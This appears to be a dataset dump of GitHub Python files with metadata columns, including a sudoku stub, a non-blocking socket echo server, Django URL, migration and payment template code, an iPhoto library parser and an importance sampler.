blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
sequencelengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
dcaa5f0a9632efd7fbc43f1cdf8d739b0161c222 | 1d2bbeda56f8fede69cd9ebde6f5f2b8a50d4a41 | /hard/python3/c0006_37_sudoku-solver/00_leetcode_0006.py | b12724d00299702d5e3f0bb08ed2233d0c6d66e9 | [] | no_license | drunkwater/leetcode | 38b8e477eade68250d0bc8b2317542aa62431e03 | 8cc4a07763e71efbaedb523015f0c1eff2927f60 | refs/heads/master | 2020-04-06T07:09:43.798498 | 2018-06-20T02:06:40 | 2018-06-20T02:06:40 | 127,843,545 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,049 | py | # DRUNKWATER TEMPLATE(add description and prototypes)
# Question Title and Description on leetcode.com
# Function Declaration and Function Prototypes on leetcode.com
#37. Sudoku Solver
#Write a program to solve a Sudoku puzzle by filling the empty cells.
#A sudoku solution must satisfy all of the following rules:
#Each of the digits 1-9 must occur exactly once in each row.
#Each of the digits 1-9 must occur exactly once in each column.
#Each of the the digits 1-9 must occur exactly once in each of the 9 3x3 sub-boxes of the grid.
#Empty cells are indicated by the character '.'.
#A sudoku puzzle...
#...and its solution numbers marked in red.
#Note:
#The given board contain only digits 1-9 and the character '.'.
#You may assume that the given Sudoku puzzle will have a single unique solution.
#The given board size is always 9x9.
#class Solution:
# def solveSudoku(self, board):
# """
# :type board: List[List[str]]
# :rtype: void Do not return anything, modify board in-place instead.
# """
# Time Is Money | [
"[email protected]"
] | |
16a31b69d896402cb06e319c17af7fcaddfc80e1 | fd56bcee0326b529eaf66462827ec0bf790c3335 | /days33/非阻塞模型/服务端.py | 4c09ecd799b80ff203bd598805aa7ed69eadab80 | [] | no_license | 95Li/oldboy-learning-code | d1ff638e7d9db27b03afde1ff99844f3de2d9f46 | dbf97bd5bfb906bce4e92cc378aef277e6ebd443 | refs/heads/master | 2020-03-21T15:59:31.604549 | 2018-06-27T14:32:12 | 2018-06-27T14:32:12 | 138,744,611 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,104 | py | from socket import *
import time
s=socket()
s.bind(('172.0.0.1',8080))
s.listen(5)
s.setblocking(False)
r_list=[]
w_list=[]
while True:
try:
conn,addr=s.accept()
r_list.append(conn)
except BlockingIOError:
print('ganhuo')
print('rlist',len(r_list))
del_rlist=[]
for conn in r_list:
try:
date=conn.recv(1024)
w_list.append((conn,date.upper()))
except BlockingIOError :
continue
except ConnectionResetError:
del_rlist.append(conn)
del_wlist=[]
for item in w_list:
try :
conn=item[0]
date=item[1]
conn.send(date)
del_wlist.append(item)
except BlockingIOError :
continue
except ConnectionResetError:
del_wlist.append(item)
for conn in del_rlist:
r_list.remove(conn)
for item in del_wlist:
w_list.remove(item)
| [
"[email protected]"
] | |
f99afe6266414414ff87f689507fa29216429229 | 8ca6f67883355bd9678a3b8a26ec7fe7b464f5c1 | /project/deluxenation/urls.py | a6b9c3c3b09a2dcc9fba1dedda77b6389c95600e | [] | no_license | mmahnken/deluxenation | 868f971f1d2d73052e5f8a3444a7751141710c02 | 35f94a053db378dc4835868766e69c836f58eb1c | refs/heads/master | 2020-09-21T20:52:56.268009 | 2017-02-06T05:21:42 | 2017-02-06T05:21:42 | 66,738,373 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,345 | py | """project URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.10/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
from django.contrib.admin.views.decorators import staff_member_required
from django.conf.urls.static import static
import drawings.urls
import drawings.views
import settings
urlpatterns = [
url(r'^admin/nb/$', staff_member_required(drawings.views.NotebookCreateView.as_view(template_name='drawings/notebook_create.html'))),
url(r'^admin/bulk-add/drawings/$', staff_member_required(drawings.views.BulkDrawingCreateView.as_view(template_name='drawings/bulk-add.html'))),
url(r'^admin/', admin.site.urls),
url(r'^', include(drawings.urls)),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| [
"[email protected]"
] | |
f78c278d29399237b8c709646ac66aac72e5c105 | ba54b70f93fe7f9d114623d76b1ad3f88309d66f | /paysto/templatetags/paysto_tags.py | 9b92d8d51facb7986b806436b724bb611b2dd303 | [] | no_license | loobinsk/newprj | 9769b2f26092ce7dd8612fce37adebb307b01b8b | c6aa6a46973fb46375f4b05a86fe76207a8ae16d | refs/heads/master | 2023-05-07T00:28:44.242163 | 2021-05-25T08:22:05 | 2021-05-25T08:22:05 | 370,617,690 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,329 | py | #-*- coding: utf-8 -*-
from django import template
from paysto import PAYSTO_ONLINE_MERCHANT_NOCART_URL
from paysto.forms import PaymentForm
from django.conf import settings
from paysto.models import BasePayment
from django.utils.safestring import mark_safe
register = template.Library()
@register.inclusion_tag('paysto/payment-form.html', takes_context=True)
def payment_form(context, payment):
form = PaymentForm(data={
'PAYSTO_SHOP_ID': settings.PAYSTO_SHOP_ID,
'PAYSTO_SUM': payment.total,
'PAYSTO_INVOICE_ID': payment.id,
'PAYSTO_DESC': payment.description,
'PayerEmail': payment.user.email
})
return {
'form': form,
'action': PAYSTO_ONLINE_MERCHANT_NOCART_URL
}
@register.filter
def payment_status(status):
if status == BasePayment.STATUS_CONFIRMED:
return mark_safe('<span class="text-success">%s</span>' % BasePayment.STATUSES[status])
if status == BasePayment.STATUS_WAITING:
return mark_safe('<span class="text-muted">%s</span>' % BasePayment.STATUSES[status])
if status == BasePayment.STATUS_ERROR:
return mark_safe('<span class="text-danger">%s</span>' % BasePayment.STATUSES[status])
else:
try:
return mark_safe(BasePayment.STATUSES[status])
except:
return "" | [
"[email protected]"
] | |
a3a575bf96ed9e2f22999b912246dbf230f5d0c3 | 9b6db11ea5bf899625857078988e1d66fbd14212 | /iphoto2html/iphotodata.py | 232745a728d98e2f80b12129c43a3169feb85404 | [
"Apache-2.0"
] | permissive | mblondel/iphoto2html | d5757c8350470f36128b6633433b0667997c509f | 95c48847972d5d1c595f44fac6edbfaa72c9ac88 | refs/heads/master | 2020-05-31T17:27:31.323177 | 2014-05-11T05:42:27 | 2014-05-11T05:42:27 | 19,658,739 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 23,489 | py | '''iPhoto database: reads iPhoto database and parses it into albums and images.
@author: [email protected]
This class reads iPhoto image, event, album information from the file
AlbumData.xml in the iPhoto library directory. That file is written by iPhoto
for the media browser in other applications. All data are
organized in the class IPhotoData. Images in iPhoto are grouped using events
(formerly knows as rolls) and albums. Each image is in exactly one event, and
optionally, in zero or more albums. Albums can be nested (folders). The album
types are:
Flagged - flagged pictures
Folder - contains other albums
Published - an album published to MobileMe
Regular - a regular user created album
SelectedEventAlbum - most recent album (as shown in iPhoto)
Shelf - list of flagged images
Smart - a user created smart album
SpecialMonth - "Last Month"
SpecialRoll - "Last Import"
Event - this type does not exist in the XML file, but we use it in this code
to allow us to treat events just like any other album
Face - Face album (does not exist in iPhoto, only in this code).
None - should not really happen
'''
# Copyright 2010 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
import os
import sys
import applexml
import imageutils
import systemutils as sysutils
def parse_face_rectangle(string_data):
"""Parse a rectangle specification into an array of coordinate data.
Args:
string_data: Rectangle like '{{x, y}, {width, height}}'
Returns:
Array of x, y, width and height as floats.
"""
try:
return [float(entry.strip('{} ')) for entry in string_data.split(',')]
except ValueError:
print >> sys.stderr, 'Failed to parse rectangle ' + string_data
return [ 0.4, 0.4, 0.2, 0.2 ]
def _get_aperture_master_path(preview_path):
"""Given a path to a Aperture preview image, return the folder where the
Master would be stored if it is in the library."""
# Folder where preview image is stored.
folder = os.path.dirname(preview_path)
# Cut of the last folder in the path (see iphotodata_test.py for
# example).
folder = os.path.dirname(folder)
return folder.replace('/Previews/', '/Masters/', 1)
class IPhotoData(object):
"""top level iPhoto data node."""
def __init__(self, xml_data, is_aperture):
"""# call with results of readAppleXML."""
self.data = xml_data
self.aperture = is_aperture
self.albums = {}
self.face_albums = None
# Master map of keywords
self.keywords = self.data.get("List of Keywords")
self.face_names = {} # Master map of faces
face_list = self.data.get("List of Faces")
if face_list:
for face_entry in face_list.values():
face_key = face_entry.get("key")
face_name = face_entry.get("name")
self.face_names[face_key] = face_name
# Other keys in face_entry: image, key image face index,
# PhotoCount, Order
self.images_by_id = {}
image_data = self.data.get("Master Image List")
if image_data:
for key in image_data:
image = IPhotoImage(image_data.get(key), self.keywords,
self.face_names)
self.images_by_id[key] = image
album_data = self.data.get("List of Albums")
self.root_album = IPhotoContainer("", "Root", None, None)
for data in album_data:
album = IPhotoAlbum(data, self.images_by_id, self.albums,
self.root_album)
self.albums[album.albumid] = album
roll_data = self.data.get("List of Rolls")
self._rolls = {}
if roll_data:
for roll in roll_data:
roll = IPhotoRoll(roll, self.images_by_id)
self._rolls[roll.albumid] = roll
self.root_album.addalbum(roll)
self.images_by_base_name = None
self.images_by_file_name = None
def _build_image_name_list(self):
self.images_by_base_name = {}
self.images_by_file_name = {}
# build the basename map
for image in self.images_by_id.values():
base_name = image.getbasename()
other_images = self.images_by_base_name.get(base_name)
if other_images is None:
other_images = []
self.images_by_base_name[base_name] = other_images
other_images.append(image)
imagename = image.getimagename()
other_image_list = self.images_by_file_name.get(imagename)
if other_image_list is None:
other_image_list = []
self.images_by_file_name[imagename] = other_image_list
other_image_list.append(image)
def _getapplicationversion(self):
return self.data.get("Application Version")
applicationVersion = property(_getapplicationversion, doc='iPhoto version')
def _getimages(self):
return self.images_by_id.values()
images = property(_getimages, "List of images")
def _getrolls(self):
return self._rolls.values()
rolls = property(_getrolls, "List of rolls (events)")
def getroll(self, album_id):
return self._rolls.get(album_id)
def getbaseimages(self, base_name):
"""returns an IPhotoImage list of all images with a matching base name.
"""
if not self.images_by_base_name:
self._build_image_name_list()
return self.images_by_base_name.get(base_name)
def getnamedimage(self, file_name):
"""returns an IPhotoImage for the given file name."""
if not self.images_by_file_name:
self._build_image_name_list()
image_list = self.images_by_file_name.get(file_name)
if image_list:
return image_list[0]
return None
def getallimages(self):
"""returns map from full path name to image."""
image_map = {}
for image in self.images_by_id.values():
image_map[image.getimagepath()] = image
image_map[image.thumbpath] = image
if image.originalpath is not None:
image_map[image.originalpath] = image
return image_map
def checkalbumsizes(self, max_size):
"""Prints a message for any event or album that has too many images."""
messages = []
for album in self._rolls.values():
if album.size > max_size:
messages.append("%s: event too large (%d)" % (album.name,
album.size))
for album in self.albums.values():
if album.albumtype == "Regular" and album.size > max_size:
messages.append("%s: album too large (%d)" % (album.name,
album.size))
messages.sort()
for message in messages:
print message
def load_aperture_originals(self):
"""Attempts to locate the original image files (Masters). Only works if
the masters are stored in the library."""
if not self.aperture:
return
for image in self.images_by_id.values():
image.find_aperture_original()
# public void checkComments() {
# TreeSet<String> images = new TreeSet<String>();
# for (IPhotoImage image : images_by_id.values()) {
# String comment = image.GetComment();
# if ((comment == null or comment.length() == 0) && !image.IsHidden())
# images.add(image.caption);
# }
# for (String caption : images)
# System.out.println(caption + ": missing comment.");
# }
def check_inalbums(self):
"""Checks that all images are in albums according to their events."""
messages = []
for image in self.images_by_id.values():
if image.IsHidden():
continue
roll_name = self._rolls[image.roll].name
albums = []
in_album = False
for album in image.GetAlbums():
album_name = album.name
if album.GetAlbumType == "Regular":
albums.append(album.name)
in_album = True
if album_name != roll_name:
messages.append(image.caption + ": in wrong album (" +
roll_name + " vs. " + album_name + ").")
elif (album.isSmart() and album_name.endswith(" Collection") or
album_name == "People" or album_name == "Unorganized"):
in_album = True
if not in_album:
messages.append(image.caption + ": not in any album.")
if albums:
messages.append(image.caption + ": in more than one album: " +
" ".join(albums))
messages.sort()
for message in messages:
print message
def getfacealbums(self):
"""Returns a map of albums for faces."""
if self.face_albums:
return self.face_albums.values()
# Build the albums on first call
self.face_albums = {}
for image in self.images:
for face in image.getfaces():
face_album = self.face_albums.get(face)
if not face_album:
face_album = IPhotoFace(face)
self.face_albums[face] = face_album
face_album.addimage(image)
return self.face_albums.values()
class IPhotoImage(object):
"""Describes an image in the iPhoto database."""
def __init__(self, data, keyword_map, face_map):
self.data = data
self._caption = sysutils.nn_string(data.get("Caption")).strip()
self.comment = sysutils.nn_string(data.get("Comment")).strip()
if data.has_key("DateAsTimerInterval"):
self.date = applexml.getappletime(data.get("DateAsTimerInterval"))
else:
self.date = None
self.mod_date = applexml.getappletime(
data.get("ModDateAsTimerInterval"))
self.image_path = data.get("ImagePath")
if data.has_key("Rating"):
self.rating = int(data.get("Rating"))
else:
self.rating = None
if data.get("longitude"):
latitude = float(data.get("latitude"))
longitude = float(data.get("longitude"))
self.gps = imageutils.GpsLocation(latitude, longitude)
else:
self.gps = None
self.keywords = []
keyword_list = data.get("Keywords")
if keyword_list is not None:
for i in keyword_list:
self.keywords.append(keyword_map.get(i))
self.originalpath = data.get("OriginalPath")
self.roll = data.get("Roll")
self.albums = [] # list of albums that this image belongs to
self.faces = []
self.face_rectangles = []
self.event_name = '' # name of event (roll) that this image belongs to
self.event_index = '' # index within event
self.event_index0 = '' # index with event, left padded with 0
face_list = data.get("Faces")
if face_list:
for face_entry in face_list:
face_key = face_entry.get("face key")
face_name = face_map.get(face_key)
if face_name:
self.faces.append(face_name)
# Rectangle is '{{x, y}, {width, height}}' as ratios,
# referencing the lower left corner of the face rectangle.
self.face_rectangles.append(parse_face_rectangle(
face_entry.get("rectangle")))
# Other keys in face_entry: face index
def getimagepath(self):
"""Returns the full path to this image.."""
return self.image_path
def getimagename(self):
"""Returns the file name of this image.."""
name = os.path.split(self.image_path)[1]
return name
def getbasename(self):
"""Returns the base name of the main image file."""
return sysutils.getfilebasename(self.image_path)
def _getcaption(self):
if not self._caption:
return self.getimagename()
return self._caption
caption = property(_getcaption, doc="Caption (title) of the image")
def ismovie(self):
"""Tests if this image is a movie."""
return self.data.get("MediaType") == "Movie"
def addalbum(self, album):
"""Adds an album to the list of albums for this image."""
self.albums.append(album)
def addface(self, name):
"""Adds a face (name) to the list of faces for this image."""
self.faces.append(name)
def getfaces(self):
"""Gets the list of face tags for this image."""
return self.faces
def ishidden(self):
"""Tests if the image is hidden (using keyword "Hidden")"""
return "Hidden" in self.keywords
def _getthumbpath(self):
return self.data.get("ThumbPath")
thumbpath = property(_getthumbpath, doc="Path to thumbnail image")
def _getrotationisonlyedit(self):
return self.data.get("RotationIsOnlyEdit")
rotation_is_only_edit = property(_getrotationisonlyedit,
doc="Rotation is only edit.")
def _search_for_file(self, folder_path, basename):
"""Scans recursively through a folder tree and returns the path to the
first file it finds that starts with "basename".
"""
for file_name in os.listdir(folder_path):
path = os.path.join(folder_path, file_name)
if os.path.isdir(path):
path = self._search_for_file(path, basename)
if path:
return path
elif file_name.startswith(basename):
return path
return None
def find_aperture_original(self):
"""Attempts to locate the Aperture Master image. Works only for .jpg
masters that are stored in the Aperture library. Saves the result as
originalpath."""
master_path = _get_aperture_master_path(self.image_path)
if not os.path.exists(master_path):
return
basename = sysutils.getfilebasename(self.image_path)
file_name = os.path.join(master_path, basename + '.jpg')
if os.path.exists(file_name):
self.originalpath = file_name
return
path = self._search_for_file(master_path, basename + '.')
if path:
self.originalpath = path
return
print "No master for " + self.image_path
class IPhotoContainer(object):
"""Base class for IPhotoAlbum and IPhotoRoll."""
def __init__(self, name, albumtype, data, images):
self.name = name
self.date = None
# The iPhoto master album has no album type.
if not albumtype and name == 'Photos':
albumtype = 'Master'
# Convert Aperture numeric album types to iPhoto album type names.
if albumtype == '1':
albumtype = 'Regular'
elif albumtype == '2':
albumtype = 'Smart'
elif albumtype == '3':
albumtype = 'Special'
elif albumtype == '4':
albumtype = 'Event'
elif albumtype == '5':
albumtype = 'Library'
elif albumtype == '6':
albumtype = 'Folder'
elif albumtype == '18':
albumtype = 'OnlineAccount'
elif albumtype == '20':
albumtype = 'Published'
elif not albumtype:
print 'No album type for %s.' % name
elif albumtype.isdigit():
albumid = int(albumtype)
if albumid > 90:
# 94 - Photos
# 95 - Flagged
# 96 - Library Album
# 97 - Projects
# 98 - Aperture
# 99 - Aperture Library
albumtype = name
else:
print 'Unknown album type %s for %s.' % (albumtype, name)
self.albumtype = albumtype
self.data = data
self.albumid = -1
self.images = []
self.albums = []
self.master = False
if not self.isfolder() and data and data.has_key("KeyList"):
keylist = data.get("KeyList")
for key in keylist:
image = images.get(key)
if image:
self.images.append(image)
else:
print "%s: image with id %s does not exist." % (name, key)
def _getcomment(self):
return self.data.get("Comments")
comment = property(_getcomment, doc='comments (description)')
def _getsize(self):
return len(self.images)
size = property(_getsize, "Gets the size (# of images) of this album.")
def isfolder(self):
"""tests if this album is a folder."""
return "Folder" == self.albumtype
def getfolderhint(self):
"""Gets a suggested folder name from comments."""
if self.comment:
for comment in self.comment.split("\n"):
if comment.startswith("@"):
return comment[1:]
return None
def getcommentwithouthints(self):
"""Gets the image comments, with any folder hint lines removed"""
result = []
if self.comment:
for line in self.comment.split("\n"):
if not line.startswith("@"):
result.append(line)
return "\n".join(result)
def addalbum(self, album):
"""adds an album to this container."""
self.albums.append(album)
def find_oldest_date(self):
# For containers that don't have a date, we calculate it from the image
# dates.
if self.date:
return
self.date = datetime.datetime.now()
for image in self.images:
if image.date and image.date < self.date:
self.date = image.date
def tostring(self):
"""Gets a string that describes this album or event."""
return "%s (%s)" % (self.name, self.albumtype)
def ishidden(self):
return all([img.ishidden() for img in self.images])
class IPhotoRoll(IPhotoContainer):
"""Describes an iPhoto Roll or Event."""
def __init__(self, data, images):
IPhotoContainer.__init__(self,
data.get("RollName")
if data.has_key("RollName")
else data.get("AlbumName"),
"Event", data, images)
self.albumid = data.get("RollID")
if not self.albumid:
self.albumid = data.get("AlbumId")
self.date = applexml.getappletime(self.data.get(
"RollDateAsTimerInterval"))
if not self.date:
self.date = applexml.getappletime(self.data.get(
'ProjectEarliestDateAsTimerInterval'))
i = 1
index_digits = len(str(len(self.images)))
for image in self.images:
image.event_name = self.name
image.event_index = i
image.event_index0 = str(i).zfill(index_digits)
i += 1
class IPhotoAlbum(IPhotoContainer):
"""Describes an iPhoto Album."""
def __init__(self, data, images, album_map, root_album):
IPhotoContainer.__init__(self, data.get("AlbumName"),
data.get("Album Type"),
data, images)
self.albumid = data.get("AlbumId")
if data.has_key("Master"):
self.master = True
parent_id = data.get("Parent")
if parent_id is None:
self.parent = root_album
else:
self.parent = album_map.get(parent_id)
if not self.parent:
print "Album %s: parent with id %d not found." % (
self.name, parent_id)
if self.parent:
self.parent.addalbum(self)
self.find_oldest_date()
class IPhotoFace(object):
"""An IPhotoContainer compatible class for a face."""
def __init__(self, face):
self.name = face
self.albumtype = "Face"
self.albumid = -1
self.images = []
self.albums = []
self.comment = ""
self.date = datetime.datetime.now()
def _getsize(self):
return len(self.images)
size = property(_getsize, "Gets the size (# of images) of this album.")
def isfolder(self):
"""tests if this album is a folder."""
return False
def getfolderhint(self):
"""Gets a suggested folder name from comments."""
return None
def getcommentwithouthints(self):
"""Gets the image comments, with any folder hint lines removed"""
return ""
def addimage(self, image):
"""Adds an image to this container."""
self.images.append(image)
# Set the face date based on the earlierst image.
if image.date and image.date < self.date:
self.date = image.date
def tostring(self):
"""Gets a string that describes this album or event."""
return "%s (%s)" % (self.name, self.albumtype)
def get_album_xmlfile(library_dir):
"""Locates the iPhoto AlbumData.xml or Aperture ApertureData.xml file."""
if os.path.exists(library_dir) and os.path.isdir(library_dir):
album_xml_file = os.path.join(library_dir, "AlbumData.xml")
if os.path.exists(album_xml_file):
return album_xml_file
album_xml_file = os.path.join(library_dir, "ApertureData.xml")
if os.path.exists(album_xml_file):
return album_xml_file
raise ValueError, ("%s does not appear to be a valid iPhoto or Aperture "
"library location.") % (library_dir)
def get_iphoto_data(album_xml_file):
"""reads the iPhoto database and converts it into an iPhotoData object."""
library_dir = os.path.dirname(album_xml_file)
print "Reading iPhoto database from " + library_dir + "..."
album_xml = applexml.read_applexml(album_xml_file)
data = IPhotoData(album_xml, album_xml_file.endswith('ApertureData.xml'))
if data.aperture:
if not data.applicationVersion.startswith('3.'):
raise ValueError, "Aperture version %s not supported" % (
data.applicationVersion)
else:
if (not data.applicationVersion.startswith("9.") and
not data.applicationVersion.startswith("8.") and
not data.applicationVersion.startswith("7.") and
not data.applicationVersion.startswith("6.")):
raise ValueError, "iPhoto version %s not supported" % (
data.applicationVersion)
return data
| [
"[email protected]"
] | |
450d68a0e2c390a31c2a557f70788062ceb572ce | 048d13616971fdaf17947bf1f3b1840a30a5f6c8 | /apps/team/migrations/0002_auto_20150904_1835.py | 0b28c5bb3ba3fe9fb3786db434dec753d3076860 | [] | no_license | ImgBotApp/manutd.org.np | 449955a89959d0781f181e71ec8be5c1c8ae3c42 | 18a53f7f4c4d4e0b47a22e5b5cb99069fd257d00 | refs/heads/master | 2021-06-24T06:58:53.269028 | 2017-09-09T15:22:25 | 2017-09-09T15:22:25 | 103,154,757 | 2 | 0 | null | 2017-09-12T04:46:16 | 2017-09-11T15:40:14 | JavaScript | UTF-8 | Python | false | false | 1,586 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('team', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='player',
name='address',
),
migrations.RemoveField(
model_name='player',
name='date_of_birth',
),
migrations.RemoveField(
model_name='player',
name='name',
),
migrations.RemoveField(
model_name='player',
name='phone',
),
migrations.RemoveField(
model_name='staff',
name='address',
),
migrations.RemoveField(
model_name='staff',
name='date_of_birth',
),
migrations.RemoveField(
model_name='staff',
name='name',
),
migrations.RemoveField(
model_name='staff',
name='phone',
),
migrations.AddField(
model_name='player',
name='user',
field=models.ForeignKey(default=1, to=settings.AUTH_USER_MODEL),
preserve_default=False,
),
migrations.AddField(
model_name='staff',
name='user',
field=models.ForeignKey(default=1, to=settings.AUTH_USER_MODEL),
preserve_default=False,
),
]
| [
"[email protected]"
] | |
b63539f52ac4f3863fe9cef412753b80adfc6b28 | f9a8aecd848bcc79052ca068cc73850a63e6dfcf | /data/datasets/resampling/adaptive/importance_sampler.py | 4112726c0616b4e253a6b9843e212d7b614c2d40 | [
"MIT"
] | permissive | khoehlein/fV-SRN-Ensemble-Compression | 537981a1cd31565bb504b00ca730e8bf87e7e0ef | 2780b83d2594c1b38b57ab58087b46bee4b61e8b | refs/heads/master | 2023-04-17T09:42:48.037397 | 2022-09-07T08:55:01 | 2022-09-07T08:55:01 | 532,983,107 | 4 | 1 | null | 2022-09-06T14:39:26 | 2022-09-05T16:43:24 | Python | UTF-8 | Python | false | false | 7,115 | py | import argparse
from typing import Optional
import torch
from matplotlib import pyplot as plt
from common.mathparser import BigInteger
from inference import IFieldEvaluator
from data.datasets.resampling.coordinate_box import CoordinateBox, UnitCube
from data.datasets.resampling.adaptive.density_tree_sampler import FastDensityTreeSampler
from data.datasets.resampling.adaptive.density_tree import FastDensityTree
from data.datasets.resampling.adaptive.statistical_tests import (
FastKolmogorovSmirnovTestNd,
FastWhiteHomoscedasticityTest,
)
from data.datasets.resampling import IImportanceSampler
from data.datasets.sampling import ISampler, RandomUniformSampler
class DensityTreeImportanceSampler(IImportanceSampler):
@staticmethod
def init_parser(parser: argparse.ArgumentParser):
group = parser.add_argument_group('DensityTreeImportanceSampler')
prefix = '--importance-sampler:tree:'
group.add_argument(prefix + 'min-depth', type=int, default=4, help="""
minimum tree depth for adaptive loss grid
""")
group.add_argument(prefix + 'max-depth', type=int, default=12, help="""
maximum tree depth for adaptive loss grid
""")
group.add_argument(prefix + 'num-samples-per-node', type=int, default=128, help="""
number of samples per node for loss tree refinement
""")
group.add_argument(prefix + 'alpha', type=float, default=0.05, help="""
significance threshold for splitting decision
""")
group.add_argument(prefix + 'batch-size', type=BigInteger, default=None, help="""
batch size for loss evaluation during importance sampling (Default: Dataset batch size)
""")
group.add_argument(prefix + 'min-density', type=float, default=0.01, help="""
minimum probability density for sampling per grid box
""")
group.add_argument(prefix + 'max-ratio', type=float, default=10, help="""
maximum ratio of probability densities during node splitting
""")
# group.add_argument(prefix + 'seed', type=int, default=42, help="""
# seed for importance sampling random number generator
# """)
@staticmethod
def read_args(args: dict):
prefix = 'importance_sampler:tree:'
return {
key: args[prefix + key]
for key in ['min_depth', 'max_depth', 'num_samples_per_node', 'batch_size',
'min_density', 'max_ratio', 'alpha']
}
@classmethod
def from_dict(cls, args, dimension=None, device=None):
sampler_kws = DensityTreeImportanceSampler.read_args(args)
return DensityTreeImportanceSampler(**sampler_kws, dimension=dimension, device=device)
def __init__(
self,
sampler: Optional[ISampler] = None, dimension:Optional[int] = None, batch_size=None,
min_depth=4, max_depth=8, num_samples_per_node=128, min_density=0.01, max_ratio=10,
alpha=0.05, root_box: Optional[CoordinateBox] = None, device=None, dtype=None, seed=None
):
if dimension is None and sampler is not None:
dimension = sampler.dimension
if dimension is None and root_box is not None:
dimension = root_box.dimension
assert dimension is not None
if sampler is not None:
assert dimension == sampler.dimension
if device is not None:
assert device == sampler.device
if dtype is not None:
assert dtype == sampler.dtype
device = sampler.device
dtype = sampler.dtype
else:
assert device is not None
sampler = RandomUniformSampler(dimension, device=device, dtype=dtype)
if root_box is not None:
assert dimension == root_box.dimension
assert device == root_box.device
else:
root_box = UnitCube(dimension, device=device, dtype=dtype)
super(DensityTreeImportanceSampler, self).__init__(dimension, root_box, device)
self.dimension = dimension
self.sampler = sampler
self.root_box = root_box
self.min_depth = min_depth
self.max_depth = max_depth
self.num_samples_per_node = num_samples_per_node
self.min_density = min_density
self.max_ratio = max_ratio
self.alpha = alpha
assert batch_size is not None
self.batch_size = int(batch_size)
self.dtype = dtype
self.device = device
def generate_samples(self, num_samples: int, evaluator: IFieldEvaluator, **kwargs):
with torch.no_grad():
difference_test = FastKolmogorovSmirnovTestNd(alpha=self.alpha)
homoscedasticity_test = FastWhiteHomoscedasticityTest(alpha=self.alpha)
tree = FastDensityTree.from_scalar_field(
self.root_box, self.sampler, evaluator, difference_test, homoscedasticity_test=homoscedasticity_test,
min_depth=self.min_depth,max_depth=self.max_depth, num_samples_per_node=self.num_samples_per_node,
store_sample_summary=True, num_samples_per_batch=self.batch_size,
device=self.device
)
tree.add_summaries()
sampler = FastDensityTreeSampler(
self.sampler, tree,
min_density=self.min_density, max_ratio=self.max_ratio
)
samples, weights = sampler.generate_samples(num_samples)
if samples.device != self.device:
samples = samples.to(self.device)
weights = weights.to(self.device)
perm = torch.randperm(num_samples, device=torch.device('cpu'))
samples = samples[perm]
weights = weights[perm]
return samples, weights
def _test_sampler():
import torch
from torch import Tensor
class Evaluator(IFieldEvaluator):
def __init__(self, dimension, device=None):
super(Evaluator, self).__init__(dimension, 1, device)
self.direction = 4 * torch.tensor([1] * dimension, device=device)[None, :]# torch.randn(1, dimension, device=device)
self.offset = torch.tensor([0.5] * dimension, device=device)[None, :] # torch.randn(1, dimension, device=device)
def forward(self, positions: Tensor) -> Tensor:
return torch.sum(self.direction * (positions - self.offset), dim=-1) ** 2
device = torch.device('cuda:0')
evaluator = Evaluator(3, device=device)
sampler = DensityTreeImportanceSampler(
dimension=3, device=device, batch_size=64**3,
max_ratio=3,
min_density=0.1
)
for i in range(20):
samples = sampler.generate_samples(4000, evaluator)
c = evaluator.evaluate(samples)
samples = samples.data.cpu().numpy()
c = c[:, 0].data.cpu().numpy()
fig = plt.figure()
ax = fig.add_subplot(projection='3d')
ax.scatter(samples[:, 0], samples[:, 1], samples[:, 2], c=c)
plt.show()
plt.close()
if __name__ == '__main__':
_test_sampler() | [
"[email protected]"
] | |
